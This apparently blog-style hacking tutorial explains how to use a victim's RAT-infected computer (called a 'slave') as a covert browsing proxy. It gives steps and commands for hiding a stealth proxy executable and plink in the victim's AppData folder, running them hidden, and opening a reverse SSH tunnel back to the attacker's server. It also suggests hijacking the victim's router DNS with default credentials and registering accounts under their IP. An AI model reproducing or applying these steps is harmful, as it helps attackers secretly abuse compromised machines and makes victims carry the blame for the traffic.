Advanced Proxying 2.0
Disclaimer : This post is for educational purposes of learning network security.
I am not responsible what you do with this information.
Updated: How to use your slaves connection to browse the internet
After extensive research and testing, I have found a much better and more stable way to pull off browsing the internet through your slave's machine. Ncat is not a part of this guide as it is not very stable for creating a proxy server.
Remember. This is an exercise in the art of subtlety. We want to be able to use the Slave as a transparent proxy WITHOUT tipping them off!
What you will need:
An SSH server running on your local machine - I have found that BitVise SSH server does not have control flow errors in tunneling like the other options http://www.bitvise.com/
Port 22 forwarded on your router to the machine running BitVise SSH server.
Firefox with FoxyProxy STANDARD Add-On installed
Plink executable - command line putty. I'm not linking it. May the google-fu be strong with you...
*gproxy and config file - an autoit script for a stealth proxy server
Slaves - duh
I did not create gproxy, I only tweaked the code to my liking. Reinventing the wheel is not high on my list
I'm not going to go over portforwarding with you. If you setup port forwarding for a RAT you should be able to setup a simple forward for port 22.
Installing Bitvise SSH Server.
When you go to install this ssh server, do not forget to choose PERSONAL EDITION! If you don't, your install will only be active for 30 days.
As soon as the installation is done, you'll be presented With this:
Click on open easy settings and you will get this screen, make sure it matches what I have below:
Click on tab 3 and then add a virtual account. Click on the blue link to set password:
Save changes, then click on start server on the main Bitvise control panel.
Setting them up to proxy
As stated before, gproxy.exe is just an autoit script that I found that does the job we need and config.ini is just the port settings. The contents of config.ini should be:
Code:
[SYSTEM]
PROXYPORT=8080
PROXYIP=127.0.0.1
PROXYPORTSSL=8181
I am not going to link the executable here, im simply going to give you the autoit script. Go get auto it and compile it yourself you lazy bastards!:
Anyway after compiling gproxy, upload gproxy.exe, config.ini, and plink.exe to the slaves machine. The best spot I have found is C:\Users\[nameofslave]\appdata\.
Starting the proxy process and tunnelling
Open up the remote shell and navigate to the directory where you uploaded the three files. Simply type gproxy.exe to start the process. The code was tweaked to run hidden and no tray icon.
Now close the shell, and open another shell. This time, you're going to navigate to the same directory, but your're going to run the following command:
Code:
plink.exe -R 8080:127.0.0.1:8080 -R 8181:127.0.0.1:8181 ipaddress -l loginname -pw password
It's going to ask you if u want to cache the server, yadda yadda..type N for no. Because you don't want to leave a footprint on the slave's machine. At this point you should be left with a shell to your ssh server, from the remote shell..(I know, it's confusing...shell in a shell..SHELLCEPTION!)
Setting up Foxy Proxy Settings.
Not going to lie. I may lose some of you on this. It's ok. If you get dizzy, you may want to sit down for a minute before you hurt yourself...
This is what it should look like without anything in it:
Click on add proxy and follow the settings for the three tabs accordingly:
(url patterns are HTTP://* and HTTPS://*
This should be the finished product:
Important to note is that when you're using them as a proxy, select mode to "Use proxies based on their pre-defined patterns and priorities"
Browse out to google and type "what's my ip address". It should be the slave's external WAN address now...
Dafuq did I just do???
Let me break it down. You're making an ssh connection back to your ssh server from the slave. SSH is very useful for tunneling traffic mostly because you don't need to keep adding port
forwarding rules to your router and the traffic is encrypted.
With the plink command, essentially you're making 2 tunnels. One for HTTP traffic and one for HTTPS traffic. Essentially you're opening two tunnels with the dual -R flag. Your computer is now listening on both 8080 and 8181 and forwarding anything that is sent to it to the slaves machine on those same ports.
Gproxy.exe on the remote machine is then intercepting that traffic, and forwarding it out to the host, then sending data back to the "local" machine you are on.
Foxy proxy is matching url patterns to send traffic to the right tunnel. HTTP to 8080 and HTTPS to 8181.
Quick summary logic.
1. Install ssh server on your local machine
2. Port forward port 22 on your router to the ssh server computer
3. Upload gproxy.exe, config.ini and plink.exe to slave in a discreet place
4. start gproxy.exe on slaves machine
5. close remote shell window and reopen, run plink.exe -R 8080:127.0.0.1:8080 -R
8181:127.0.0.1:8181 ipaddress -l loginname -pw password
6. setup your local browser to proxy HTTP to 127.0.0.1 port 8080 and HTTPS to 127.0.0.1 port 8181
Fun things to do once this is setup:
Try to access slaves router and use default credentials
Point their DNS somewhere fun!
Sign up for an email account using that ip address.
BEFORE YOU ASK. NO you cannot use this to log into JAGEX'd RS accounts. That is outside the scope of this tutorial as the Java program that runs RS does not go through the proxy when you load it.
That does not mean it can't be done, it means that there is more to it than that.
What's to come:
Working on a guide to do this then setup a vpn connection so you are totally on their network to defeat Jagex.
Code for autoit gproxy
inb4wheredoifindgproxy!
No comments:
Post a Comment